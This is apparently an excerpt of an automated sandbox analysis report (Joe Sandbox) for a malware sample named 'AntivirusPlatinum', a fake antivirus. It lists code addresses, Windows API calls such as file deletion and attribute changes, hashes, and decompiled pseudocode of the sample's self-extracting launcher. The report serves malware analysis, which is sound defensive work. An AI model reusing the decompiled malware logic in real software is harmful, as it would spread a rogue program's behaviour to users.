                                                                                                                                                  0x0040c0e8
                                                                                                                                                  0x0040c0ea
                                                                                                                                                  0x0040c256
                                                                                                                                                  0x0040c25c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c0f0
                                                                                                                                                  0x0040c0f0
                                                                                                                                                  0x0040c0f5
                                                                                                                                                  0x0040c0fe
                                                                                                                                                  0x0040c104
                                                                                                                                                  0x0040c10b
                                                                                                                                                  0x0040c1bb
                                                                                                                                                  0x0040c1c2
                                                                                                                                                  0x0040c1c4
                                                                                                                                                  0x0040c1c7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c1d0
                                                                                                                                                  0x0040c1d6
                                                                                                                                                  0x0040c1d8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c1da
                                                                                                                                                  0x0040c1da
                                                                                                                                                  0x0040c1dd
                                                                                                                                                  0x0040c1de
                                                                                                                                                  0x0040c1e6
                                                                                                                                                  0x0040c1f5
                                                                                                                                                  0x0040c1f7
                                                                                                                                                  0x0040c201
                                                                                                                                                  0x0040c203
                                                                                                                                                  0x0040c206
                                                                                                                                                  0x0040c1e0
                                                                                                                                                  0x0040c1e0
                                                                                                                                                  0x0040c1e0
                                                                                                                                                  0x0040c1e3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c208
                                                                                                                                                  0x0040c216
                                                                                                                                                  0x0040c21c
                                                                                                                                                  0x0040c21e
                                                                                                                                                  0x0040c220
                                                                                                                                                  0x0040c225
                                                                                                                                                  0x0040c227
                                                                                                                                                  0x0040c234
                                                                                                                                                  0x0040c234
                                                                                                                                                  0x0040c227
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c21e
                                                                                                                                                  0x0040c206
                                                                                                                                                  0x0040c1d8
                                                                                                                                                  0x0040c116
                                                                                                                                                  0x0040c119
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c12d
                                                                                                                                                  0x0040c139
                                                                                                                                                  0x0040c145
                                                                                                                                                  0x0040c14a
                                                                                                                                                  0x0040c14d
                                                                                                                                                  0x0040c150
                                                                                                                                                  0x0040c163
                                                                                                                                                  0x0040c16c
                                                                                                                                                  0x0040c171
                                                                                                                                                  0x0040c173
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c179
                                                                                                                                                  0x0040c187
                                                                                                                                                  0x0040c195
                                                                                                                                                  0x0040c19a
                                                                                                                                                  0x0040c19c
                                                                                                                                                  0x0040c19d
                                                                                                                                                  0x0040c1a7
                                                                                                                                                  0x0040c1ae
                                                                                                                                                  0x0040c1b5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c1b5
                                                                                                                                                  0x0040c159
                                                                                                                                                  0x0040c15e
                                                                                                                                                  0x0040c161
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c23a
                                                                                                                                                  0x0040c23a
                                                                                                                                                  0x0040c243
                                                                                                                                                  0x0040c249
                                                                                                                                                  0x0040c24e
                                                                                                                                                  0x0040c24e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c0f5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c266
                                                                                                                                                  0x0040c26a
                                                                                                                                                  0x0040c270
                                                                                                                                                  0x0040c275
                                                                                                                                                  0x0040c277
                                                                                                                                                  0x0040c27a
                                                                                                                                                  0x0040c27c
                                                                                                                                                  0x0040c284
                                                                                                                                                  0x0040c284
                                                                                                                                                  0x0040c289
                                                                                                                                                  0x0040c28d
                                                                                                                                                  0x0040c297
                                                                                                                                                  0x0040c29f
                                                                                                                                                  0x0040c28f
                                                                                                                                                  0x0040c28f
                                                                                                                                                  0x0040c28f
                                                                                                                                                  0x0040c2a1
                                                                                                                                                  0x0040c2a3
                                                                                                                                                  0x0040c2b4
                                                                                                                                                  0x0040c2a5
                                                                                                                                                  0x0040c2a5
                                                                                                                                                  0x0040c2a5
                                                                                                                                                  0x0040c2bc
                                                                                                                                                  0x0040c2c7
                                                                                                                                                  0x0040c2cc
                                                                                                                                                  0x0040c2d1
                                                                                                                                                  0x0040c2d3
                                                                                                                                                  0x0040c2d5
                                                                                                                                                  0x0040c2d5
                                                                                                                                                  0x0040c2da
                                                                                                                                                  0x0040c2df
                                                                                                                                                  0x0040c2e3
                                                                                                                                                  0x0040c2ea
                                                                                                                                                  0x0040c2ea
                                                                                                                                                  0x0040c2e3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c2f4
                                                                                                                                                  0x0040c2f8
                                                                                                                                                  0x0040c308
                                                                                                                                                  0x0040c308
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c313
                                                                                                                                                  0x0040c317
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c31d
                                                                                                                                                  0x0040c324
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c32a
                                                                                                                                                  0x0040c331
                                                                                                                                                  0x0040c337
                                                                                                                                                  0x0040c33e
                                                                                                                                                  0x0040c340
                                                                                                                                                  0x0040c340
                                                                                                                                                  0x0040c347
                                                                                                                                                  0x0040c34c
                                                                                                                                                  0x0040c351
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c357
                                                                                                                                                  0x0040c357
                                                                                                                                                  0x0040c359
                                                                                                                                                  0x0040c35b
                                                                                                                                                  0x0040c408
                                                                                                                                                  0x0040c408
                                                                                                                                                  0x0040c40a
                                                                                                                                                  0x0040c36e
                                                                                                                                                  0x0040c376
                                                                                                                                                  0x0040c37b
                                                                                                                                                  0x0040c37d
                                                                                                                                                  0x0040c384
                                                                                                                                                  0x0040c389
                                                                                                                                                  0x0040c38b
                                                                                                                                                  0x0040c38d
                                                                                                                                                  0x0040c391
                                                                                                                                                  0x0040c393
                                                                                                                                                  0x0040c393
                                                                                                                                                  0x0040c391
                                                                                                                                                  0x0040c39e
                                                                                                                                                  0x0040c3aa
                                                                                                                                                  0x0040c3ba
                                                                                                                                                  0x0040c3c4
                                                                                                                                                  0x0040c3d3
                                                                                                                                                  0x0040c3d9
                                                                                                                                                  0x0040c3e1
                                                                                                                                                  0x0040c3e6
                                                                                                                                                  0x0040c3e8
                                                                                                                                                  0x0040c3fd
                                                                                                                                                  0x0040c3fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c3e8
                                                                                                                                                  0x0040c410
                                                                                                                                                  0x0040c412
                                                                                                                                                  0x0040c41e
                                                                                                                                                  0x0040c41e
                                                                                                                                                  0x0040c430
                                                                                                                                                  0x0040c436
                                                                                                                                                  0x0040c438
                                                                                                                                                  0x0040c43e
                                                                                                                                                  0x0040c445
                                                                                                                                                  0x0040c453
                                                                                                                                                  0x0040c463
                                                                                                                                                  0x0040c463
                                                                                                                                                  0x0040c469
                                                                                                                                                  0x0040c470
                                                                                                                                                  0x0040c472
                                                                                                                                                  0x0040c479
                                                                                                                                                  0x0040c47e
                                                                                                                                                  0x0040c484
                                                                                                                                                  0x0040c485
                                                                                                                                                  0x0040c489
                                                                                                                                                  0x0040c497
                                                                                                                                                  0x0040c497
                                                                                                                                                  0x0040c489
                                                                                                                                                  0x0040c4a2
                                                                                                                                                  0x0040c4a4
                                                                                                                                                  0x0040c4b0
                                                                                                                                                  0x0040c4b2
                                                                                                                                                  0x0040c4b8
                                                                                                                                                  0x0040c4c6
                                                                                                                                                  0x0040c4c6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c4b8
                                                                                                                                                  0x0040c414
                                                                                                                                                  0x0040c418
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c418
                                                                                                                                                  0x0040c361
                                                                                                                                                  0x0040c365
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c36b
                                                                                                                                                  0x0040c36b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c36b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c4d0
                                                                                                                                                  0x0040c4d1
                                                                                                                                                  0x0040c4d6
                                                                                                                                                  0x0040c4d8
                                                                                                                                                  0x0040c4db
                                                                                                                                                  0x0040c4db
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c511
                                                                                                                                                  0x0040c518
                                                                                                                                                  0x0040c518
                                                                                                                                                  0x0040c51b
                                                                                                                                                  0x0040c548
                                                                                                                                                  0x0040c548
                                                                                                                                                  0x0040c54f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c54f
                                                                                                                                                  0x0040c51d
                                                                                                                                                  0x0040c51d
                                                                                                                                                  0x0040c520
                                                                                                                                                  0x0040c535
                                                                                                                                                  0x0040c53c
                                                                                                                                                  0x0040c53c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c53c
                                                                                                                                                  0x0040c522
                                                                                                                                                  0x0040c522
                                                                                                                                                  0x0040c523
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c525
                                                                                                                                                  0x0040c525
                                                                                                                                                  0x0040c526
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c52c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c59d
                                                                                                                                                  0x0040c5a1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c5a7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c5b9
                                                                                                                                                  0x0040c5bd
                                                                                                                                                  0x0040c71c
                                                                                                                                                  0x0040c71c
                                                                                                                                                  0x0040c720
                                                                                                                                                  0x0040c726
                                                                                                                                                  0x0040c72d
                                                                                                                                                  0x0040c72f
                                                                                                                                                  0x0040c72f
                                                                                                                                                  0x0040c739
                                                                                                                                                  0x0040c739
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c720
                                                                                                                                                  0x0040c5cf
                                                                                                                                                  0x0040c5dc
                                                                                                                                                  0x0040c5e1
                                                                                                                                                  0x0040c5e5
                                                                                                                                                  0x0040c5e7
                                                                                                                                                  0x0040c5f4
                                                                                                                                                  0x0040c5f4
                                                                                                                                                  0x0040c5fa
                                                                                                                                                  0x0040c600
                                                                                                                                                  0x0040c601
                                                                                                                                                  0x0040c607
                                                                                                                                                  0x0040c608
                                                                                                                                                  0x0040c609
                                                                                                                                                  0x0040c60b
                                                                                                                                                  0x0040c60e
                                                                                                                                                  0x0040c614
                                                                                                                                                  0x0040c615
                                                                                                                                                  0x0040c617
                                                                                                                                                  0x0040c61a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c5ee
                                                                                                                                                  0x0040c5ee
                                                                                                                                                  0x0040c5ee
                                                                                                                                                  0x0040c5f1
                                                                                                                                                  0x0040c5f1
                                                                                                                                                  0x0040c628
                                                                                                                                                  0x0040c62e
                                                                                                                                                  0x0040c635
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c63b
                                                                                                                                                  0x0040c642
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c64a
                                                                                                                                                  0x0040c651
                                                                                                                                                  0x0040c658
                                                                                                                                                  0x0040c65d
                                                                                                                                                  0x0040c65f
                                                                                                                                                  0x0040c69f
                                                                                                                                                  0x0040c69f
                                                                                                                                                  0x0040c6a6
                                                                                                                                                  0x0040c6af
                                                                                                                                                  0x0040c6bb
                                                                                                                                                  0x0040c6c9
                                                                                                                                                  0x0040c6c9
                                                                                                                                                  0x0040c6d5
                                                                                                                                                  0x0040c6e3
                                                                                                                                                  0x0040c6ed
                                                                                                                                                  0x0040c6f4
                                                                                                                                                  0x0040c6fa
                                                                                                                                                  0x0040c6fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c703
                                                                                                                                                  0x0040c705
                                                                                                                                                  0x0040c705
                                                                                                                                                  0x0040c70a
                                                                                                                                                  0x0040c711
                                                                                                                                                  0x0040c716
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c716
                                                                                                                                                  0x0040c6fd
                                                                                                                                                  0x0040c661
                                                                                                                                                  0x0040c663
                                                                                                                                                  0x0040c66a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c66c
                                                                                                                                                  0x0040c66c
                                                                                                                                                  0x0040c66c
                                                                                                                                                  0x0040c674
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c676
                                                                                                                                                  0x0040c677
                                                                                                                                                  0x0040c67f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c681
                                                                                                                                                  0x0040c68b
                                                                                                                                                  0x0040c692
                                                                                                                                                  0x0040c697
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c745
                                                                                                                                                  0x0040c749
                                                                                                                                                  0x0040c74b
                                                                                                                                                  0x0040c752
                                                                                                                                                  0x0040c75e
                                                                                                                                                  0x0040c75e
                                                                                                                                                  0x0040c764
                                                                                                                                                  0x0040c76c
                                                                                                                                                  0x0040c76c
                                                                                                                                                  0x0040c771
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c77d
                                                                                                                                                  0x0040c781
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c787
                                                                                                                                                  0x0040c5a9
                                                                                                                                                  0x0040c5af
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c78e
                                                                                                                                                  0x0040c792
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c798
                                                                                                                                                  0x0040c7a0
                                                                                                                                                  0x0040c7a5
                                                                                                                                                  0x0040c7a5
                                                                                                                                                  0x0040c7a8
                                                                                                                                                  0x0040c7cd
                                                                                                                                                  0x0040c7aa
                                                                                                                                                  0x0040c7aa
                                                                                                                                                  0x0040c7aa
                                                                                                                                                  0x0040c7ad
                                                                                                                                                  0x0040c7c4
                                                                                                                                                  0x0040c7af
                                                                                                                                                  0x0040c7af
                                                                                                                                                  0x0040c7af
                                                                                                                                                  0x0040c7b0
                                                                                                                                                  0x0040c7bb
                                                                                                                                                  0x0040c7b2
                                                                                                                                                  0x0040c7b2
                                                                                                                                                  0x0040c7b2
                                                                                                                                                  0x0040c7b0
                                                                                                                                                  0x0040c7ad
                                                                                                                                                  0x0040c7db
                                                                                                                                                  0x0040c7e2
                                                                                                                                                  0x0040c7e9
                                                                                                                                                  0x0040c7f0
                                                                                                                                                  0x0040c7f5
                                                                                                                                                  0x0040c7fc
                                                                                                                                                  0x0040c846
                                                                                                                                                  0x0040c84b
                                                                                                                                                  0x0040c84d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c84f
                                                                                                                                                  0x0040c851
                                                                                                                                                  0x0040c858
                                                                                                                                                  0x0040c85e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c860
                                                                                                                                                  0x0040c860
                                                                                                                                                  0x0040c860
                                                                                                                                                  0x0040c862
                                                                                                                                                  0x0040c865
                                                                                                                                                  0x0040c86c
                                                                                                                                                  0x0040c86e
                                                                                                                                                  0x0040c875
                                                                                                                                                  0x0040c878
                                                                                                                                                  0x0040c87d
                                                                                                                                                  0x0040c87f
                                                                                                                                                  0x0040c8b1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8b1
                                                                                                                                                  0x0040c881
                                                                                                                                                  0x0040c883
                                                                                                                                                  0x0040c886
                                                                                                                                                  0x0040c89a
                                                                                                                                                  0x0040c89a
                                                                                                                                                  0x0040c89b
                                                                                                                                                  0x0040c89b
                                                                                                                                                  0x0040c8a0
                                                                                                                                                  0x0040c8a1
                                                                                                                                                  0x0040c8a7
                                                                                                                                                  0x0040c8a7
                                                                                                                                                  0x0040c8a8
                                                                                                                                                  0x0040c8ad
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8ad
                                                                                                                                                  0x0040c888
                                                                                                                                                  0x0040c888
                                                                                                                                                  0x0040c88b
                                                                                                                                                  0x0040c88c
                                                                                                                                                  0x0040c892
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c892
                                                                                                                                                  0x0040c867
                                                                                                                                                  0x0040c86a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8b3
                                                                                                                                                  0x0040c8b3
                                                                                                                                                  0x0040c8b4
                                                                                                                                                  0x0040c8b4
                                                                                                                                                  0x0040c8b9
                                                                                                                                                  0x0040c8bb
                                                                                                                                                  0x0040c8bd
                                                                                                                                                  0x0040c8bd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7fe
                                                                                                                                                  0x0040c805
                                                                                                                                                  0x0040c813
                                                                                                                                                  0x0040c81a
                                                                                                                                                  0x0040c81f
                                                                                                                                                  0x0040c821
                                                                                                                                                  0x0040c827
                                                                                                                                                  0x0040c833
                                                                                                                                                  0x0040c833
                                                                                                                                                  0x0040c8c0
                                                                                                                                                  0x0040c8c0
                                                                                                                                                  0x0040c8c7
                                                                                                                                                  0x0040c8d0
                                                                                                                                                  0x0040c8d7
                                                                                                                                                  0x0040c8d7
                                                                                                                                                  0x0040c8e3
                                                                                                                                                  0x0040c8f2
                                                                                                                                                  0x0040c8f9
                                                                                                                                                  0x0040c905
                                                                                                                                                  0x0040c90a
                                                                                                                                                  0x0040c911
                                                                                                                                                  0x0040c91a
                                                                                                                                                  0x0040c926
                                                                                                                                                  0x0040c92d
                                                                                                                                                  0x0040c92d
                                                                                                                                                  0x0040c939
                                                                                                                                                  0x0040c940
                                                                                                                                                  0x0040c945
                                                                                                                                                  0x0040c94c
                                                                                                                                                  0x0040c952
                                                                                                                                                  0x0040c954
                                                                                                                                                  0x0040c954
                                                                                                                                                  0x0040c968
                                                                                                                                                  0x0040c96d
                                                                                                                                                  0x0040c974
                                                                                                                                                  0x0040c979
                                                                                                                                                  0x0040c97b
                                                                                                                                                  0x0040c98c
                                                                                                                                                  0x0040c998
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c97d
                                                                                                                                                  0x0040c983
                                                                                                                                                  0x0040c988
                                                                                                                                                  0x0040c98a
                                                                                                                                                  0x0040c99d
                                                                                                                                                  0x0040c9a8
                                                                                                                                                  0x0040c9b4
                                                                                                                                                  0x0040c9b6
                                                                                                                                                  0x0040c9b8
                                                                                                                                                  0x0040c9c1
                                                                                                                                                  0x0040c9c8
                                                                                                                                                  0x0040c9ca
                                                                                                                                                  0x0040c9cc
                                                                                                                                                  0x0040c9d5
                                                                                                                                                  0x0040c9dc
                                                                                                                                                  0x0040c9de
                                                                                                                                                  0x0040c9e0
                                                                                                                                                  0x0040c9e9
                                                                                                                                                  0x0040c9f7
                                                                                                                                                  0x0040c9fc
                                                                                                                                                  0x0040ca03
                                                                                                                                                  0x0040ca07
                                                                                                                                                  0x0040ca15
                                                                                                                                                  0x0040ca15
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ca03
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c98a
                                                                                                                                                  0x0040c97b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ca1d
                                                                                                                                                  0x0040ca21
                                                                                                                                                  0x0040ca23
                                                                                                                                                  0x0040ca23
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c55b
                                                                                                                                                  0x0040c563
                                                                                                                                                  0x0040c568
                                                                                                                                                  0x0040c56b
                                                                                                                                                  0x0040c591
                                                                                                                                                  0x0040c56d
                                                                                                                                                  0x0040c56d
                                                                                                                                                  0x0040c570
                                                                                                                                                  0x0040c585
                                                                                                                                                  0x0040c572
                                                                                                                                                  0x0040c572
                                                                                                                                                  0x0040c579
                                                                                                                                                  0x0040c579
                                                                                                                                                  0x0040c570
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c008
                                                                                                                                                  0x0040c00c
                                                                                                                                                  0x0040c011
                                                                                                                                                  0x0040c018
                                                                                                                                                  0x0040c018
                                                                                                                                                  0x0040c01b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c01d
                                                                                                                                                  0x0040c01d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c01d
                                                                                                                                                  0x0040ca2a
                                                                                                                                                  0x0040ca48
                                                                                                                                                  0x0040ca4d
                                                                                                                                                  0x0040ca50
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ca59

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0040B613: ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00001000,?,00000000,?,0040BFD4,00000000,?,?,?,?,?,?,0040D24D,?), ref: 0040B6BB
                                                                                                                                                  • lstrcmpiA.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,0040D24D,?,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 0040C032
                                                                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000400,?,?,0040D24D,?,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,0041A818,0041A824,?), ref: 0040C074
                                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,0040D24D,?,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 0040C0FE
                                                                                                                                                  • SHFileOperationA.SHELL32(?,?,00000000), ref: 0040C1B5
                                                                                                                                                  • GetFileAttributesA.KERNEL32(?), ref: 0040C1C2
                                                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040C1D0
                                                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 0040C308
                                                                                                                                                  • GetDlgItem.USER32 ref: 0040C3B4
                                                                                                                                                  • SetWindowTextA.USER32(00000000,00000000), ref: 0040C3C4
                                                                                                                                                  • SendMessageA.USER32(00000000,00000143,00000000,%s.%d.tmp), ref: 0040C3D3
                                                                                                                                                  • SendMessageA.USER32(00000000,00000143,00000000,00000000), ref: 0040C3FD
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$AttributesMessageSendTextWindow$CurrentDeleteDirectoryEnvironmentExpandItemOperationStringslstrcmpi
                                                                                                                                                  • String ID: "$%s.%d.tmp$<br>$C:\WINDOWS$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                  • API String ID: 297094968-4244017151
                                                                                                                                                  • Opcode ID: d36ffacd43a2f8a78fecda516e75c7e09bd54960045749e9d3b70807280ed642
                                                                                                                                                  • Instruction ID: 26b2c8a04a2213872833e54c54379dca27802e9aad8b41e31b2901df3c031a3a
                                                                                                                                                  • Opcode Fuzzy Hash: d36ffacd43a2f8a78fecda516e75c7e09bd54960045749e9d3b70807280ed642
                                                                                                                                                  • Instruction Fuzzy Hash: 84E13CB1901219EADB21EBA0CD85FDE77BCAB04304F4081B7AA05F21D1DB78AB55CF59
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                  			E0040D33C() {
                                                                                                                                                  				char _v12;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				char _v40;
                                                                                                                                                  				intOrPtr _v44;
                                                                                                                                                  				char _v68;
                                                                                                                                                  				void* _t18;
                                                                                                                                                  				int _t28;
                                                                                                                                                  				void* _t34;
                                                                                                                                                  				void* _t54;
                                                                                                                                                  				struct HINSTANCE__* _t56;
                                                                                                                                                  				CHAR* _t57;
                                                                                                                                                  				intOrPtr _t62;
                                                                                                                                                  				int _t65;
                                                                                                                                                  				intOrPtr _t66;
                                                                                                                                                  
                                                                                                                                                  				__imp__OleInitialize(0); // executed
                                                                                                                                                  				E0040E428(0x41fdc0);
                                                                                                                                                  				_t57 = GetCommandLineA();
                                                                                                                                                  				_t60 = _t57;
                                                                                                                                                  				if(_t57 != 0) {
                                                                                                                                                  					E0040B485(0x41fdc0, _t60, _t57);
                                                                                                                                                  					SetEnvironmentVariableA("sfxcmd", _t57); // executed
                                                                                                                                                  				}
                                                                                                                                                  				GetModuleFileNameA(0, 0x419ad8, 0x400);
                                                                                                                                                  				SetEnvironmentVariableA("sfxname", 0x419ad8); // executed
                                                                                                                                                  				if(E00406EA5() == 0) {
                                                                                                                                                  					__eflags = 0;
                                                                                                                                                  					 *0x4192d8 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					GetModuleFileNameW(0, "C:\Users\alfons\Desktop\Endermanch@AntivirusPlatinum.exe", 0x400);
                                                                                                                                                  				}
                                                                                                                                                  				_t56 = GetModuleHandleA(0);
                                                                                                                                                  				 *0x414c78 = _t56; // executed
                                                                                                                                                  				_t18 = LoadIconA(_t56, 0x64); // executed
                                                                                                                                                  				 *0x4192d4 = _t18;
                                                                                                                                                  				 *0x4192d0 = LoadBitmapA( *0x414c78, 0x65); // executed
                                                                                                                                                  				E00411585( &_v12); // executed
                                                                                                                                                  				E004098E0(0, 0x414c88, _t54, 0x419ad8);
                                                                                                                                                  				E00406479( &_v68);
                                                                                                                                                  				E00406479( &_v40);
                                                                                                                                                  				_v44 = E0040ACA1(0x64);
                                                                                                                                                  				_v16 = E0040ACA1(0x64);
                                                                                                                                                  				 *0x418ecc =  &_v68;
                                                                                                                                                  				 *0x418ec8 =  &_v40; // executed
                                                                                                                                                  				_t28 = DialogBoxParamA(_t56, "STARTDLG", 0, E0040CC24, 0); // executed
                                                                                                                                                  				 *0x419f80 = 0;
                                                                                                                                                  				 *0x418ec8 = 0;
                                                                                                                                                  				 *0x418ecc = 0;
                                                                                                                                                  				E0040648F(E0040648F(_t28,  &_v40),  &_v68);
                                                                                                                                                  				_t52 =  &_v12;
                                                                                                                                                  				E004115FD( &_v12);
                                                                                                                                                  				_t62 =  *0x419f88; // 0x0
                                                                                                                                                  				if(_t62 != 0) {
                                                                                                                                                  					E0040B729( &_v12);
                                                                                                                                                  				}
                                                                                                                                                  				E0040A289(_t52, 0x419ee8, 0, 0x80);
                                                                                                                                                  				if( *0x41a824 > 0) {
                                                                                                                                                  					E0040A205( *0x41a818);
                                                                                                                                                  				}
                                                                                                                                                  				DeleteObject( *0x4192d4);
                                                                                                                                                  				_t34 =  *0x4192d0; // 0x5d050a36
                                                                                                                                                  				if(_t34 != 0) {
                                                                                                                                                  					DeleteObject(_t34);
                                                                                                                                                  				}
                                                                                                                                                  				_t65 =  *0x414c7c; // 0x0
                                                                                                                                                  				if(_t65 == 0) {
                                                                                                                                                  					_t66 =  *0x419f78; // 0x2
                                                                                                                                                  					if(_t66 != 0) {
                                                                                                                                                  						E0040325C(0x414c7c, 0xff);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t35 =  *0x41a828;
                                                                                                                                                  				 *0x419f78 = 2;
                                                                                                                                                  				if( *0x41a828 != 0) {
                                                                                                                                                  					E0040B6EA(_t35); // executed
                                                                                                                                                  				}
                                                                                                                                                  				__imp__OleUninitialize(); // executed
                                                                                                                                                  				ExitProcess( *0x414c7c);
                                                                                                                                                  			}

















                                                                                                                                                  0x0040d348
                                                                                                                                                  0x0040d353
                                                                                                                                                  0x0040d364
                                                                                                                                                  0x0040d366
                                                                                                                                                  0x0040d368
                                                                                                                                                  0x0040d36b
                                                                                                                                                  0x0040d376
                                                                                                                                                  0x0040d376
                                                                                                                                                  0x0040d384
                                                                                                                                                  0x0040d390
                                                                                                                                                  0x0040d399
                                                                                                                                                  0x0040d3ae
                                                                                                                                                  0x0040d3b0
                                                                                                                                                  0x0040d39b
                                                                                                                                                  0x0040d3a6
                                                                                                                                                  0x0040d3a6
                                                                                                                                                  0x0040d3bd
                                                                                                                                                  0x0040d3c2
                                                                                                                                                  0x0040d3c8
                                                                                                                                                  0x0040d3d6
                                                                                                                                                  0x0040d3e4
                                                                                                                                                  0x0040d3e9
                                                                                                                                                  0x0040d3f4
                                                                                                                                                  0x0040d3fc
                                                                                                                                                  0x0040d404
                                                                                                                                                  0x0040d412
                                                                                                                                                  0x0040d420
                                                                                                                                                  0x0040d427
                                                                                                                                                  0x0040d435
